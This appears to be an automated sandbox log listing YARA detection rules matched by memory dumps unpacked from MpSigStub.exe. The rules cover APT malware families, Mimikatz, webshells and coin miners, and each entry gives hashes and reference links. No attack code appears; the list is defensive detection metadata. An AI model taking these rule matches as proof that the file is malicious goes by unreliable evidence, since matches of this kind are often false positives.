Source: 35.3.MpSigStub.exe.15b1bb549ea.103.raw.unpack, type: UNPACKEDPE Matched rule: APT_APT41_POISONPLUG date = 2019-08-07, hash4 = 3e6c4e97cc09d0432fbbbf3f3e424d4aa967d3073b6002305cd6573c47f0341f, hash3 = f4d57acde4bc546a10cd199c70cdad09f576fdfe66a36b08a00c19ff6ae19661, hash2 = 5d971ed3947597fbb7e51d806647b37d64d9fe915b35c7c9eaf79a37b82dab90, author = Florian Roth, description = Detects APT41 malware POISONPLUG, reference = https://www.fireeye.com/blog/threat-research/2019/08/apt41-dual-espionage-and-cyber-crime-operation.html, score = 2eea29d83f485897e2bac9501ef000cc266ffe10019d8c529555a3435ac4aabd
Source: 35.3.MpSigStub.exe.15b1bb549ea.103.raw.unpack, type: UNPACKEDPE Matched rule: APT_MAL_HOPLIGHT_NK_HiddenCobra_Apr19_3 date = 2019-04-13, hash3 = ddea408e178f0412ae78ff5d5adf2439251f68cad4fd853ee466a3c74649642d, hash2 = 05feed9762bc46b47a7dc5c469add9f163c16df4ddaafe81983a628da5714461, hash1 = 2151c1977b4555a1761c12f151969f8e853e26c396fa1a7b74ccbaf3a48f4525, author = Florian Roth, description = Detects HOPLIGHT malware used by HiddenCobra APT group, reference = https://www.us-cert.gov/ncas/analysis-reports/AR19-100A
Source: 35.3.MpSigStub.exe.15b1b59fe5d.109.raw.unpack, type: UNPACKEDPE Matched rule: CoinMiner_Strings date = 2018-01-04, author = Florian Roth, description = Detects mining pool protocol string in Executable, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://minergate.com/faq/what-pool-address
Source: 35.3.MpSigStub.exe.15b1b59fe5d.109.raw.unpack, type: UNPACKEDPE Matched rule: Typical_Malware_String_Transforms date = 2016-07-31, author = Florian Roth, description = Detects typical strings in a reversed or otherwise modified form, reference = Internal Research, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score =
Source: 35.3.MpSigStub.exe.15b1bcea0d6.57.raw.unpack, type: UNPACKEDPE Matched rule: SUSP_XORed_URL_in_EXE date = 2020-03-09, author = Florian Roth, description = Detects an XORed URL in an executable, reference = https://twitter.com/stvemillertime/status/1237035794973560834, score = , modified = 2021-05-27
Source: 35.3.MpSigStub.exe.15b1bcea0d6.57.raw.unpack, type: UNPACKEDPE Matched rule: APT_Backdoor_Win_GoRat_Memory author = FireEye, description = Identifies GoRat malware in memory based on strings., reference = https://www.fireeye.com/blog/products-and-services/2020/12/fireeye-shares-details-of-recent-cyber-attack-actions-to-protect-community.html, md5 = 3b926b5762e13ceec7ac3a61e85c93bb
Source: 35.3.MpSigStub.exe.15b1bcea0d6.51.raw.unpack, type: UNPACKEDPE Matched rule: SUSP_XORed_URL_in_EXE date = 2020-03-09, author = Florian Roth, description = Detects an XORed URL in an executable, reference = https://twitter.com/stvemillertime/status/1237035794973560834, score = , modified = 2021-05-27
Source: 35.3.MpSigStub.exe.15b1bcea0d6.51.raw.unpack, type: UNPACKEDPE Matched rule: APT_Backdoor_Win_GoRat_Memory author = FireEye, description = Identifies GoRat malware in memory based on strings., reference = https://www.fireeye.com/blog/products-and-services/2020/12/fireeye-shares-details-of-recent-cyber-attack-actions-to-protect-community.html, md5 = 3b926b5762e13ceec7ac3a61e85c93bb
Source: 35.3.MpSigStub.exe.15b1b59d455.149.raw.unpack, type: UNPACKEDPE Matched rule: CoinMiner_Strings date = 2018-01-04, author = Florian Roth, description = Detects mining pool protocol string in Executable, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://minergate.com/faq/what-pool-address
Source: 35.3.MpSigStub.exe.15b1b59d455.149.raw.unpack, type: UNPACKEDPE Matched rule: Typical_Malware_String_Transforms date = 2016-07-31, author = Florian Roth, description = Detects typical strings in a reversed or otherwise modified form, reference = Internal Research, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score =
Source: 35.3.MpSigStub.exe.15b1aac7d52.155.raw.unpack, type: UNPACKEDPE Matched rule: SUSP_Microsoft_7z_SFX_Combo date = 2018-09-16, hash1 = cce63f209ee4efb4f0419fb4bbb32326392b5ef85cfba80b5b42b861637f1ff1, author = Florian Roth, description = Detects a suspicious file that has a Microsoft copyright and is a 7z SFX, reference = Internal Research
Source: 35.3.MpSigStub.exe.15b1b9ca5ba.42.raw.unpack, type: UNPACKEDPE Matched rule: IMPLANT_4_v5 date = 2017-02-10, author = US CERT, description = BlackEnergy / Voodoo Bear Implant by APT28, reference = https://www.us-cert.gov/ncas/current-activity/2017/02/10/Enhanced-Analysis-GRIZZLY-STEPPE, score =
Source: 35.3.MpSigStub.exe.15b1b9ca5ba.42.raw.unpack, type: UNPACKEDPE Matched rule: Derusbi_Kernel_Driver_WD_UDFS date = 2015-12-15, hash4 = e27fb16dce7fff714f4b05f2cef53e1919a34d7ec0e595f2eaa155861a213e59, hash3 = 6cdb65dbfb2c236b6d149fd9836cb484d0608ea082cf5bd88edde31ad11a0d58, hash2 = 50174311e524b97ea5cb4f3ea571dd477d1f0eee06cd3ed73af39a15f3e6484a, author = Florian Roth, description = Detects Derusbi Kernel Driver, reference = http://blog.airbuscybersecurity.com/post/2015/11/Newcomers-in-the-Derusbi-family, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = 1b449121300b0188ff9f6a8c399fb818d0cf53fd36cf012e6908a2665a27f016
Source: 35.3.MpSigStub.exe.15b1b9ca5ba.42.raw.unpack, type: UNPACKEDPE Matched rule: SUSP_XORed_Mozilla date = 2019-10-28, author = Florian Roth, description = Detects suspicious XORed keyword - Mozilla/5.0, reference = Internal Research, score =
Source: 35.3.MpSigStub.exe.15b1c05a7fa.78.unpack, type: UNPACKEDPE Matched rule: SUSP_Modified_SystemExeFileName_in_File date = 2018-12-11, hash2 = f1f11830b60e6530b680291509ddd9b5a1e5f425550444ec964a08f5f0c1a44e, author = Florian Roth, description = Detecst a variant of a system file name often used by attackers to cloak their activity, reference = https://www.symantec.com/blogs/threat-intelligence/seedworm-espionage-group, score = 5723f425e0c55c22c6b8bb74afb6b506943012c33b9ec1c928a71307a8c5889a
Source: 35.3.MpSigStub.exe.15b1c47d182.111.raw.unpack, type: UNPACKEDPE Matched rule: Mimikatz_Strings date = 2016-06-08, author = Florian Roth, description = Detects Mimikatz strings, reference = not set, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score =
Source: 35.3.MpSigStub.exe.15b1c47d182.111.raw.unpack, type: UNPACKEDPE Matched rule: webshell_asp_generic_eval_on_input date = 2021/01/07, author = Arnim Rupp, description = Generic ASP webshell which uses any eval/exec function directly on user input, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, hash = 069ea990d32fc980939fffdf1aed77384bf7806bc57c0a7faaff33bd1a3447f6
Source: 35.3.MpSigStub.exe.15b1c47d182.111.raw.unpack, type: UNPACKEDPE Matched rule: CoinMiner_Strings date = 2018-01-04, author = Florian Roth, description = Detects mining pool protocol string in Executable, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://minergate.com/faq/what-pool-address
Source: 35.3.MpSigStub.exe.15b1aab7177.152.unpack, type: UNPACKEDPE Matched rule: SUSP_Microsoft_7z_SFX_Combo date = 2018-09-16, hash1 = cce63f209ee4efb4f0419fb4bbb32326392b5ef85cfba80b5b42b861637f1ff1, author = Florian Roth, description = Detects a suspicious file that has a Microsoft copyright and is a 7z SFX, reference = Internal Research
Source: 35.3.MpSigStub.exe.15b1aab7177.152.unpack, type: UNPACKEDPE Matched rule: korlia author = Nick Hoffman, reference = http://www.morphick.com/resources/lab-blog/curious-korlia, company = Morphick, information = korlia malware found in apt dump
Source: 35.3.MpSigStub.exe.15b1b013bb2.54.unpack, type: UNPACKEDPE Matched rule: IMPLANT_4_v5 date = 2017-02-10, author = US CERT, description = BlackEnergy / Voodoo Bear Implant by APT28, reference = https://www.us-cert.gov/ncas/current-activity/2017/02/10/Enhanced-Analysis-GRIZZLY-STEPPE, score =
Source: 35.3.MpSigStub.exe.15b1b013bb2.54.unpack, type: UNPACKEDPE Matched rule: Destructive_Ransomware_Gen1 date = 2018-02-12, hash1 = ae9a4e244a9b3c77d489dee8aeaf35a7c3ba31b210e76d81ef2e91790f052c85, author = Florian Roth, description = Detects destructive malware, reference = http://blog.talosintelligence.com/2018/02/olympic-destroyer.html, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 35.3.MpSigStub.exe.15b1c2d858a.187.raw.unpack, type: UNPACKEDPE Matched rule: CoinMiner_Strings date = 2018-01-04, author = Florian Roth, description = Detects mining pool protocol string in Executable, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://minergate.com/faq/what-pool-address
Source: 35.3.MpSigStub.exe.15b1aac714e.153.raw.unpack, type: UNPACKEDPE Matched rule: SUSP_Microsoft_7z_SFX_Combo date = 2018-09-16, hash1 = cce63f209ee4efb4f0419fb4bbb32326392b5ef85cfba80b5b42b861637f1ff1, author = Florian Roth, description = Detects a suspicious file that has a Microsoft copyright and is a 7z SFX, reference = Internal Research
Source: 35.3.MpSigStub.exe.15b1a80e0b6.17.raw.unpack, type: UNPACKEDPE Matched rule: Hacktool_Strings_p0wnedShell date = 2017-01-14, hash1 = e1f35310192416cd79e60dba0521fc6eb107f3e65741c344832c46e9b4085e60, author = Florian Roth, description = p0wnedShell Runspace Post Exploitation Toolkit - file p0wnedShell.cs, reference = https://github.com/Cn33liz/p0wnedShell, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 35.3.MpSigStub.exe.15b1a80e0b6.17.raw.unpack, type: UNPACKEDPE Matched rule: Suspicious_PowerShell_WebDownload_1 date = 2017-02-22, author = Florian Roth, description = Detects suspicious PowerShell code that downloads from web sites, type = file, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = Internal Research
Source: 35.3.MpSigStub.exe.15b1a80e0b6.17.raw.unpack, type: UNPACKEDPE Matched rule: Mimikatz_Memory_Rule_1 date = 12/22/2014, author = Florian Roth, description = Detects password dumper mimikatz in memory (False Positives: an service that could have copied a Mimikatz executable, AV signatures), license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = memory
Source: 35.3.MpSigStub.exe.15b1bf7bf4d.37.raw.unpack, type: UNPACKEDPE Matched rule: TA17_293A_malware_1 date = 2017/07/17, hash5 = 038A97B4E2F37F34B255F0643E49FC9D, hash4 = 04738CA02F59A5CD394998A99FCD9613, hash3 = 8943E71A8C73B5E343AA9D2E19002373, hash2 = BA756DD64C1147515BA2298B6A760260, hash1 = A07AA521E7CAFB360294E56969EDA5D6, hash0 = 61C909D2F625223DB2FB858BBDF42A76, author = US-CERT Code Analysis Team (modified by Florian Roth), description = inveigh pen testing tools & related artifacts, hash10 = 4595DBE00A538DF127E0079294C87DA0, hash9 = 722154A36F32BA10E98020A8AD758A7A, hash8 = 5DBEF7BDDAF50624E840CCBCE2816594, hash7 = AA905A3508D9309A93AD5C0EC26EBC9B, hash6 = 65A1A73253F04354886F375B59550B46, reference = https://www.us-cert.gov/ncas/alerts/TA17-293A
Source: 35.3.MpSigStub.exe.15b1b59e859.122.raw.unpack, type: UNPACKEDPE Matched rule: CoinMiner_Strings date = 2018-01-04, author = Florian Roth, description = Detects mining pool protocol string in Executable, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://minergate.com/faq/what-pool-address
Source: 35.3.MpSigStub.exe.15b1b59e859.122.raw.unpack, type: UNPACKEDPE Matched rule: Typical_Malware_String_Transforms date = 2016-07-31, author = Florian Roth, description = Detects typical strings in a reversed or otherwise modified form, reference = Internal Research, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score =
Source: 35.3.MpSigStub.exe.15b1a7b1586.200.raw.unpack, type: UNPACKEDPE Matched rule: APT_apt_duqu2_loaders copyright = Kaspersky Lab, description = Rule to detect Duqu 2.0 samples, version = 1.0, last_modified = 2015-06-09
Source: 35.3.MpSigStub.exe.15b1a7b1586.200.raw.unpack, type: UNPACKEDPE Matched rule: Oilrig_IntelSecurityManager date = 2018-01-19, author = Eyal Sela, description = Detects OilRig malware, reference = Internal Research
Source: 35.3.MpSigStub.exe.15b1a7b1586.200.raw.unpack, type: UNPACKEDPE Matched rule: CoinMiner_Strings date = 2018-01-04, author = Florian Roth, description = Detects mining pool protocol string in Executable, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://minergate.com/faq/what-pool-address
Source: 35.3.MpSigStub.exe.15b1a7b1586.200.raw.unpack, type: UNPACKEDPE Matched rule: apt_duqu2_loaders copyright = Kaspersky Lab, description = Rule to detect Duqu 2.0 samples, version = 1.0, last_modified = 2015-06-09
Source: 35.3.MpSigStub.exe.15b1ad1f44c.63.raw.unpack, type: UNPACKEDPE Matched rule: clearlog date = 2017-06-02, hash1 = 14093ce6d0fe8ab60963771f48937c669103842a0400b8d97f829b33c420f7e3, author = Florian Roth, description = Detects Fireball malware - file clearlog.dll, reference = https://goo.gl/4pTkGQ, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 35.3.MpSigStub.exe.15b1b785121.89.raw.unpack, type: UNPACKEDPE Matched rule: HackTool_Samples description = Hacktool, score =
Source: 35.3.MpSigStub.exe.15b1b9c97b6.41.raw.unpack, type: UNPACKEDPE Matched rule: IMPLANT_4_v5 date = 2017-02-10, author = US CERT, description = BlackEnergy / Voodoo Bear Implant by APT28, reference = https://www.us-cert.gov/ncas/current-activity/2017/02/10/Enhanced-Analysis-GRIZZLY-STEPPE, score =
Source: 35.3.MpSigStub.exe.15b1b9c97b6.41.raw.unpack, type: UNPACKEDPE Matched rule: Derusbi_Kernel_Driver_WD_UDFS date = 2015-12-15, hash4 = e27fb16dce7fff714f4b05f2cef53e1919a34d7ec0e595f2eaa155861a213e59, hash3 = 6cdb65dbfb2c236b6d149fd9836cb484d0608ea082cf5bd88edde31ad11a0d58, hash2 = 50174311e524b97ea5cb4f3ea571dd477d1f0eee06cd3ed73af39a15f3e6484a, author = Florian Roth, description = Detects Derusbi Kernel Driver, reference = http://blog.airbuscybersecurity.com/post/2015/11/Newcomers-in-the-Derusbi-family, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = 1b449121300b0188ff9f6a8c399fb818d0cf53fd36cf012e6908a2665a27f016
Source: 35.3.MpSigStub.exe.15b1b9c97b6.41.raw.unpack, type: UNPACKEDPE Matched rule: SUSP_XORed_Mozilla date = 2019-10-28, author = Florian Roth, description = Detects suspicious XORed keyword - Mozilla/5.0, reference = Internal Research, score =
Source: 35.3.MpSigStub.exe.15b1bbe6ede.15.unpack, type: UNPACKEDPE Matched rule: MiniRAT_Gen_1 date = 2018-01-22, hash5 = 675c3d96070dc9a0e437f3e1b653b90dbc6700b0ec57379d4139e65f7d2799cd, hash4 = ed97719c008422925ae21ff34448a8c35ee270a428b0478e24669396761d0790, hash3 = ba4e063472a2559b4baa82d5272304a1cdae6968145c5ef221295c90e88458e2, hash2 = b6ac374f79860ae99736aaa190cce5922a969ab060d7ae367dbfa094bfe4777d, hash1 = 091ae8d5649c4e040d25550f2cdf7f1ddfc9c698e672318eb1ab6303aa1cf85b, author = Florian Roth, description = Detects Mini RAT malware, reference = https://www.eff.org/deeplinks/2018/01/dark-caracal-good-news-and-bad-news, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 35.3.MpSigStub.exe.15b1bbe6ede.15.unpack, type: UNPACKEDPE Matched rule: malware_sakula_xorloop author = David Cannings, description = XOR loops from Sakula malware, md5 = fc6497fe708dbda9355139721b6181e7
Source: 35.3.MpSigStub.exe.15b1bbe6ede.15.unpack, type: UNPACKEDPE Matched rule: RAT_Sakula date = 2015-10-13, author = Airbus Defence and Space Cybersecurity CSIRT - Yoann Francou / NCC Group David Cannings, description = Detects Sakula v1.0 RAT, reference = http://blog.airbuscybersecurity.com/public/YFR/sakula_v1x.yara
Source: 35.3.MpSigStub.exe.15b1bbe6ede.15.unpack, type: UNPACKEDPE Matched rule: HackTool_MSIL_SharpHound_3 author = FireEye, description = The TypeLibGUID present in a .NET binary maps directly to the ProjectGuid found in the \'.csproj\' file of a .NET project. This rule looks for .NET PE files that contain the ProjectGuid found in the public SharpHound3 project., reference = https://www.fireeye.com/blog/products-and-services/2020/12/fireeye-shares-details-of-recent-cyber-attack-actions-to-protect-community.html, md5 = eeedc09570324767a3de8205f66a5295
Source: 35.3.MpSigStub.exe.15b1bbe6ede.15.unpack, type: UNPACKEDPE Matched rule: HKTL_NET_GUID_SharpHound3 date = 2020-12-29, author = Arnim Rupp, description = Detects c# red/black-team tools via typelibguid, reference = https://github.com/BloodHoundAD/SharpHound3, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 35.3.MpSigStub.exe.15b1bbe6ede.15.unpack, type: UNPACKEDPE Matched rule: Typical_Malware_String_Transforms date = 2016-07-31, author = Florian Roth, description = Detects typical strings in a reversed or otherwise modified form, reference = Internal Research, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score =
Source: 35.3.MpSigStub.exe.15b1a7cfabd.178.raw.unpack, type: UNPACKEDPE Matched rule: XOR_4byte_Key date = 2015-12-15, author = Florian Roth, description = Detects an executable encrypted with a 4 byte XOR (also used for Derusbi Trojan), reference = http://blog.airbuscybersecurity.com/post/2015/11/Newcomers-in-the-Derusbi-family, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score =
Source: 35.3.MpSigStub.exe.15b1b59fe5d.121.raw.unpack, type: UNPACKEDPE Matched rule: CoinMiner_Strings date = 2018-01-04, author = Florian Roth, description = Detects mining pool protocol string in Executable, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://minergate.com/faq/what-pool-address
Source: 35.3.MpSigStub.exe.15b1b59fe5d.121.raw.unpack, type: UNPACKEDPE Matched rule: Typical_Malware_String_Transforms date = 2016-07-31, author = Florian Roth, description = Detects typical strings in a reversed or otherwise modified form, reference = Internal Research, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score =
Source: 35.3.MpSigStub.exe.15b1af1836e.68.unpack, type: UNPACKEDPE Matched rule: SUSP_PowerShell_IEX_Download_Combo date = 2018-10-04, hash1 = 13297f64a5f4dd9b08922c18ab100d3a3e6fdeab82f60a4653ab975b8ce393d5, author = Florian Roth, description = Detects strings found in sample from CN group repo leak in October 2018, reference = https://twitter.com/JaromirHorejsi/status/1047084277920411648
Source: 35.3.MpSigStub.exe.15b1af1836e.68.unpack, type: UNPACKEDPE Matched rule: Oilrig_IntelSecurityManager_macro date = 2018-01-19, author = Eyal Sela (slightly modified by Florian Roth), description = Detects OilRig malware, reference = Internal Research
Source: 35.3.MpSigStub.exe.15b1bcea0d6.215.raw.unpack, type: UNPACKEDPE Matched rule: SUSP_XORed_URL_in_EXE date = 2020-03-09, author = Florian Roth, description = Detects an XORed URL in an executable, reference = https://twitter.com/stvemillertime/status/1237035794973560834, score = , modified = 2021-05-27
Source: 35.3.MpSigStub.exe.15b1bcea0d6.215.raw.unpack, type: UNPACKEDPE Matched rule: APT_Backdoor_Win_GoRat_Memory author = FireEye, description = Identifies GoRat malware in memory based on strings., reference = https://www.fireeye.com/blog/products-and-services/2020/12/fireeye-shares-details-of-recent-cyber-attack-actions-to-protect-community.html, md5 = 3b926b5762e13ceec7ac3a61e85c93bb
Source: 35.3.MpSigStub.exe.15b1c05a7fa.93.unpack, type: UNPACKEDPE Matched rule: SUSP_Modified_SystemExeFileName_in_File date = 2018-12-11, hash2 = f1f11830b60e6530b680291509ddd9b5a1e5f425550444ec964a08f5f0c1a44e, author = Florian Roth, description = Detecst a variant of a system file name often used by attackers to cloak their activity, reference = https://www.symantec.com/blogs/threat-intelligence/seedworm-espionage-group, score = 5723f425e0c55c22c6b8bb74afb6b506943012c33b9ec1c928a71307a8c5889a
Source: 35.3.MpSigStub.exe.15b1b41327e.91.raw.unpack, type: UNPACKEDPE Matched rule: webshell_asp_generic_eval_on_input date = 2021/01/07, author = Arnim Rupp, description = Generic ASP webshell which uses any eval/exec function directly on user input, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, hash = 069ea990d32fc980939fffdf1aed77384bf7806bc57c0a7faaff33bd1a3447f6
Source: 35.3.MpSigStub.exe.15b1c47e986.110.raw.unpack, type: UNPACKEDPE Matched rule: Mimikatz_Strings date = 2016-06-08, author = Florian Roth, description = Detects Mimikatz strings, reference = not set, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score =
Source: 35.3.MpSigStub.exe.15b1c47e986.110.raw.unpack, type: UNPACKEDPE Matched rule: webshell_asp_generic_eval_on_input date = 2021/01/07, author = Arnim Rupp, description = Generic ASP webshell which uses any eval/exec function directly on user input, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, hash = 069ea990d32fc980939fffdf1aed77384bf7806bc57c0a7faaff33bd1a3447f6
Source: 35.3.MpSigStub.exe.15b1c47e986.110.raw.unpack, type: UNPACKEDPE Matched rule: CoinMiner_Strings date = 2018-01-04, author = Florian Roth, description = Detects mining pool protocol string in Executable, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://minergate.com/faq/what-pool-address
Source: 35.3.MpSigStub.exe.15b1b2d20ac.231.raw.unpack, type: UNPACKEDPE Matched rule: GhostDragon_Gh0stRAT date = 2016-04-23, hash4 = b803381535ac24ce7c8fdcf6155566d208dfca63fd66ec71bbc6754233e251f5, hash3 = 6c7f8ba75889e0021c4616fcbee86ac06cd7f5e1e355e0cbfbbb5110c08bb6df, hash2 = 99ee5b764a5db1cb6b8a4f62605b5536487d9c35a28a23de8f9174659f65bcb2, hash1 = f9a669d22866cd041e2d520c5eb093188962bea8864fdfd0c0abb2b254e9f197, author = Florian Roth, description = Detects Gh0st RAT mentioned in Cylance\' Ghost Dragon Report, reference = https://blog.cylance.com/the-ghost-dragon, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 35.3.MpSigStub.exe.15b1b2d20ac.231.raw.unpack, type: UNPACKEDPE Matched rule: Typical_Malware_String_Transforms date = 2016-07-31, author = Florian Roth, description = Detects typical strings in a reversed or otherwise modified form, reference = Internal Research, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score =
Source: 35.3.MpSigStub.exe.15b1abe8b36.144.unpack, type: UNPACKEDPE Matched rule: dump_tool author = @patrickrolsen, reference = Related to pwdump6 and fgdump tools
Source: 35.3.MpSigStub.exe.15b1aab4af5.151.unpack, type: UNPACKEDPE Matched rule: SUSP_Microsoft_7z_SFX_Combo date = 2018-09-16, hash1 = cce63f209ee4efb4f0419fb4bbb32326392b5ef85cfba80b5b42b861637f1ff1, author = Florian Roth, description = Detects a suspicious file that has a Microsoft copyright and is a 7z SFX, reference = Internal Research
Source: 35.3.MpSigStub.exe.15b1aab4af5.151.unpack, type: UNPACKEDPE Matched rule: korlia author = Nick Hoffman, reference = http://www.morphick.com/resources/lab-blog/curious-korlia, company = Morphick, information = korlia malware found in apt dump
Source: 35.3.MpSigStub.exe.15b1b59e859.108.raw.unpack, type: UNPACKEDPE Matched rule: CoinMiner_Strings date = 2018-01-04, author = Florian Roth, description = Detects mining pool protocol string in Executable, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://minergate.com/faq/what-pool-address
Source: 35.3.MpSigStub.exe.15b1b59e859.108.raw.unpack, type: UNPACKEDPE Matched rule: Typical_Malware_String_Transforms date = 2016-07-31, author = Florian Roth, description = Detects typical strings in a reversed or otherwise modified form, reference = Internal Research, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score =
Source: 35.3.MpSigStub.exe.15b1b354b6e.95.raw.unpack, type: UNPACKEDPE Matched rule: HackTool_MSIL_SharPersist_2 author = FireEye, reference = https://www.fireeye.com/blog/products-and-services/2020/12/fireeye-shares-details-of-recent-cyber-attack-actions-to-protect-community.html, md5 = 98ecf58d48a3eae43899b45cec0fc6b7
Source: 35.3.MpSigStub.exe.15b1bf2fb91.170.raw.unpack, type: UNPACKEDPE Matched rule: CoinMiner_Strings date = 2018-01-04, author = Florian Roth, description = Detects mining pool protocol string in Executable, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://minergate.com/faq/what-pool-address
Source: 35.3.MpSigStub.exe.15b1bf2fb91.55.raw.unpack, type: UNPACKEDPE Matched rule: CoinMiner_Strings date = 2018-01-04, author = Florian Roth, description = Detects mining pool protocol string in Executable, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://minergate.com/faq/what-pool-address
Source: 35.3.MpSigStub.exe.15b1bb551ee.102.raw.unpack, type: UNPACKEDPE Matched rule: APT_DNSpionage_Karkoff_Malware_Apr19_1 date = 2019-04-24, hash4 = cd4b9d0f2d1c0468750855f0ed352c1ed6d4f512d66e0e44ce308688235295b5, hash3 = 5b102bf4d997688268bab45336cead7cdf188eb0d6355764e53b4f62e1cdf30c, hash2 = b017b9fc2484ce0a5629ff1fed15bca9f62f942eafbb74da6a40f40337187b04, hash1 = 6a251ed6a2c6a0a2be11f2a945ec68c814d27e2b6ef445f4b2c7a779620baa11, author = Florian Roth, description = Detects DNSpionage Karkoff malware, reference = https://blog.talosintelligence.com/2019/04/dnspionage-brings-out-karkoff.html
Source: 35.3.MpSigStub.exe.15b1bb551ee.102.raw.unpack, type: UNPACKEDPE Matched rule: DeepPanda_htran_exe date = 2015/02/08, author = Florian Roth, description = Hack Deep Panda - htran-exe, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, hash = 38e21f0b87b3052b536408fdf59185f8b3d210b9
Source: 35.3.MpSigStub.exe.15b1bb551ee.102.raw.unpack, type: UNPACKEDPE Matched rule: SUSP_DropperBackdoor_Keywords date = 2019-04-24, hash1 = cd4b9d0f2d1c0468750855f0ed352c1ed6d4f512d66e0e44ce308688235295b5, author = Florian Roth, description = Detects suspicious keywords that indicate a backdoor, reference = https://blog.talosintelligence.com/2019/04/dnspionage-brings-out-karkoff.html
Source: 35.3.MpSigStub.exe.15b1bb551ee.102.raw.unpack, type: UNPACKEDPE Matched rule: APT_APT41_POISONPLUG date = 2019-08-07, hash4 = 3e6c4e97cc09d0432fbbbf3f3e424d4aa967d3073b6002305cd6573c47f0341f, hash3 = f4d57acde4bc546a10cd199c70cdad09f576fdfe66a36b08a00c19ff6ae19661, hash2 = 5d971ed3947597fbb7e51d806647b37d64d9fe915b35c7c9eaf79a37b82dab90, author = Florian Roth, description = Detects APT41 malware POISONPLUG, reference = https://www.fireeye.com/blog/threat-research/2019/08/apt41-dual-espionage-and-cyber-crime-operation.html, score = 2eea29d83f485897e2bac9501ef000cc266ffe10019d8c529555a3435ac4aabd
Source: 35.3.MpSigStub.exe.15b1bb551ee.102.raw.unpack, type: UNPACKEDPE Matched rule: APT_MAL_HOPLIGHT_NK_HiddenCobra_Apr19_3 date = 2019-04-13, hash3 = ddea408e178f0412ae78ff5d5adf2439251f68cad4fd853ee466a3c74649642d, hash2 = 05feed9762bc46b47a7dc5c469add9f163c16df4ddaafe81983a628da5714461, hash1 = 2151c1977b4555a1761c12f151969f8e853e26c396fa1a7b74ccbaf3a48f4525, author = Florian Roth, description = Detects HOPLIGHT malware used by HiddenCobra APT group, reference = https://www.us-cert.gov/ncas/analysis-reports/AR19-100A
Source: 35.3.MpSigStub.exe.15b1b4cce16.210.unpack, type: UNPACKEDPE Matched rule: hacktool_macos_keylogger_logkext author = @mimeframe, description = LogKext is an open source keylogger for Mac OS X, a product of FSB software., reference = https://github.com/SlEePlEs5/logKext
Source: 35.3.MpSigStub.exe.15b1b4cce16.210.unpack, type: UNPACKEDPE Matched rule: Mimikatz_Strings date = 2016-06-08, author = Florian Roth, description = Detects Mimikatz strings, reference = not set, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score =
Source: 35.3.MpSigStub.exe.15b1b4cce16.210.unpack, type: UNPACKEDPE Matched rule: PowerShell_Susp_Parameter_Combo date = 2017-03-12, author = Florian Roth, description = Detects PowerShell invocation with suspicious parameters, reference = https://goo.gl/uAic1X, score = file
Source: 35.3.MpSigStub.exe.15b1b4cce16.210.unpack, type: UNPACKEDPE Matched rule: Typical_Malware_String_Transforms date = 2016-07-31, author = Florian Roth, description = Detects typical strings in a reversed or otherwise modified form, reference = Internal Research, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score =
Source: 35.3.MpSigStub.exe.15b1b59fe5d.150.raw.unpack, type: UNPACKEDPE Matched rule: CoinMiner_Strings date = 2018-01-04, author = Florian Roth, description = Detects mining pool protocol string in Executable, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://minergate.com/faq/what-pool-address
